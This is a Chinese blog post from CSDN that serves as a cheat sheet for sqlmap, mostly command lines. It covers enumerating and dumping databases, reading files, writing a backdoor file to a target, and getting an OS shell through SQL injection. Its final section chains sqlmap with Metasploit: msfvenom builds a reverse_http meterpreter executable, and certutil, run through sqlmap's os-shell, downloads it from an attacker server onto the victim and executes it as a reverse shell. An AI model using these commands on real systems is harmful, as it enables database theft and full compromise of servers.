Sqlmap使用/联合msf

已于 2024-03-14 22:11:30 修改
阅读量900 收藏 16
点赞数 25
文章标签: sql python 安全 学习 数据库 linux
于 2023-12-22 11:29:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63160363/article/details/135149150
版权
本文介绍了如何使用Sqlmap进行数据库注入,包括数据猜解、查看权限、执行命令、文件读写以及与Metasploit(MSF)的联动,以实现高权限访问和后门部署。
摘要由CSDN通过智能技术生成

Sqlmap使用篇

                sqlmap:中文使用手册:https://sqlmap.highlight.ink/

    一、Sqlmap 数据库注入数据猜解
    
    wind注入过程保存在 C:/Users/用户名/.sqlmap/output/文件夹中 (需要注入网站才会生成)
    kail注入过程存在 ~/.local/share/sqlmap/output/文件中 
    
    GET:
    python sqlmap.py -u "URL" --privileges #查看权限
    python sqlmap.py -u "URL" --is-dba #查看是否为管理员
    python sqlmap.py -u "URL" --purge #清除缓存
    
    python sqlmap.py -u "URL" --os-shell=(命令) #交互式命令执行
    python sqlmap.py -u "URL" --os-cmd=(命令) #交互式命令执行
    
    
    
    python sqlmap.py -u "URL" --dbs #获取数据库信息
    python sqlmap.py -u "URL" --current-db  #获取当前数据库信息
    python sqlmap.py -u "URL" --tables -D "数据库名" #获取数据库表信息
    python sqlmap.py -u "URL" --columns -T "表名" -D "数据库名" #获取数据库表的列信息
    python sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "数据库名" #获取数据库表的列内的内容
    python sqlmap.py -u "URL" --dump -C "列名,列名" -T "表名" -D "数据库名" #获取数据库表的列内的内容
    
    POST:
    python sqlmap.py -r 1.txt #1.txt为注入点数据包 。。其余操作一致
        
    二、Sqlmap 高权限注入读写执行
    python sqlmap.py -u "URL" --file-read "文件路径" #文件读取
    python sqlmap.py -u "URL" --file-write "本地后门路径" --file-dest "写入目标地址文件路径" #文件写入
    
    三、Sqlmap 高权限注入联动MSF
    为最高权限用户时
    1.    python sqlmap.py -u "URL" --os-shell=(命令) #交互式命令执行
    1.    python sqlmap.py -u "URL" --os-cmd=(命令) #交互式命令执行

    2.攻击者服务器msf生成后门
        msfvenom -p windows/meterpreter/reverse_http lhost=服务器地址 lport=端口 -f exe -o sql.exe
        开启监听:
        msf6> use exploit/multi/handler
        msf6> set lhost 0.0.0.0
        msf6> set lport 6666
        msf6> run
        
    3.目标主机
    (下载前先确认目标机盘符/地址路径)
    python sqlmap.py -u "URL" --os-shell=certutil -urlcache -split -f http://攻击者服务器地址/后门文件 下载到目标机地址下d:/sql.exe     #交互式命令执行下载后门
    python sqlmap.py -u "URL" --os-shell=d:/sql.exe 执行目标机器后门 交互式命令执行目标机上的后门反弹shell
    
    
    

小小小帽
关注
  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap联动msf
m0_63615772的博客
08-05 138
sqlmap联动msf
河南省高校联盟战队课件3(sql-sqlmap基础&msf
尘玥的故事
04-20 2290
sqlmap常用参数 1.-它支持那些其他不一样功能? 2.-使用SQLMAP一般注入流程分析? 一、常见注入点&提交方式(sqlmap判断是否有注入): 1.sqlmap设置post提交方式 -f fingerprint 指纹 (1)(sqlmap -u http=“xxxxxx” --data=“id=1” -f --banner --dbs -users) (2)(-methood = post)进行转换 2.sqlm...
黑客常用的工具之---MSF使用(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
07-15 1129
MSF默认存放模块的目录如下。
msf 笔记 & sqlmap 笔记
dqd66的博客
10-18 514
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件。
网安之web攻防第二十六天
B_l_a_nk的博客
03-31 488
1、数据库注入-Oracle&Mongodb 2、数据库注入-DB2&SQLite&Sybase 3、SQL注入神器-SQLMAP安装使用拓展
soap注入某sql2008服务器结合msf进行提权
xiaoi123的博客
06-05 3226
原文作者:陈小兵    在实际成功渗透过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次渗透利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例。1.1.1扫描soap注入漏洞    ...
sqlmap基本用法和联合注入
weixin_44098523的博客
02-02 1936
sqlmap基本用法 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的...
sqlmap使用
tell_me_404的博客
02-29 712
一,sqlmap下载安装 Python2.7.11下载 下载地址:https://www.python.org/downloads/ SQLMap下载 下载地址:http://sqlmap.org/ 二、简单使用 1、基本参数: sqlmap.py -h 查看帮助 –url / -u “” 通过url获取目标 sqlmap.py -u “http:// …/…” --is-dba ...
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1676
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
Sqlmap使用详解
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
sqlmap使用详解
糖小喵
04-26 1278
sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQLServer、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可以根据返回页面判断条件真...
2017-11-03-SQLMAP使用方法笔记
PFinal社区
11-03 228
layout title date author desc in_head post SQLMAP使用方法笔记 2017-11-03 09:03:02 +0800 Q九转 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle,...
sqlmap技巧+metasploit
had3s
04-26 2963
sqlmap基本用法就不多介绍了,本文涉及一些参数绕过技巧,以及metasploit + sqlmap结合用法0x01 常用1234567891011121314151617--delay 2 #间隔两秒发送数据包--time-sec 2 #时间盲注 默认为5秒--force-ssl #请求是HTTPS使用,或者Host头后加上:443--iden...
[工具使用]SqlMap
热门推荐
网络安全知识分享
08-29 5万+
[工具使用]SqlMapSqlMap常用指令探测目标网站是否存在注入 本文采用实例:sqli-labs靶场Less-1 SqlMap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔
Msf 基本用法
freshfox的博客
02-28 601
Msf 基本用法 Msfconsole Help nmap -sn 192.168.208.0/24主机发现 渗透攻击过程需要xp用户登录系统后才可以利用成功。 1.search MS08-0672. use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb...
sqlmap+nikto进行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 8910
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
SQLMAP/Metasploit介绍及PHP网站渗透
weixin_30332705的博客
09-14 1382
查找PHP网页: inurl:php?id= 查询jsp网页:inurl:asp?id= 判断网页的动态还是静态 www.baidu.com------>www.baidu.com/index.html-----没有报错就是静态页面 www.baidu.com/plasp?id=86------>www.baidu.com/plasp?id=86 and 1=...
SpringBoot项目中mybatis执行sql很慢的排查改造过程(Interceptor插件、fetchSize、隐式转换等)
最新发布
星月昭铭的博客
08-29 735
刚入职公司,就发现公司项目跑sql特别慢,差不多一万条数据插入到数据库要5秒以上(没有听错,就是这个速度),查询修改删除也是特别慢。直到22年年底实在是受不了了,我就去排查了一下。用的是Oracle数据库,mybatis、mybatis plus,其中mybatis是引入的平台的依赖。平台封装了一些工具和插件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值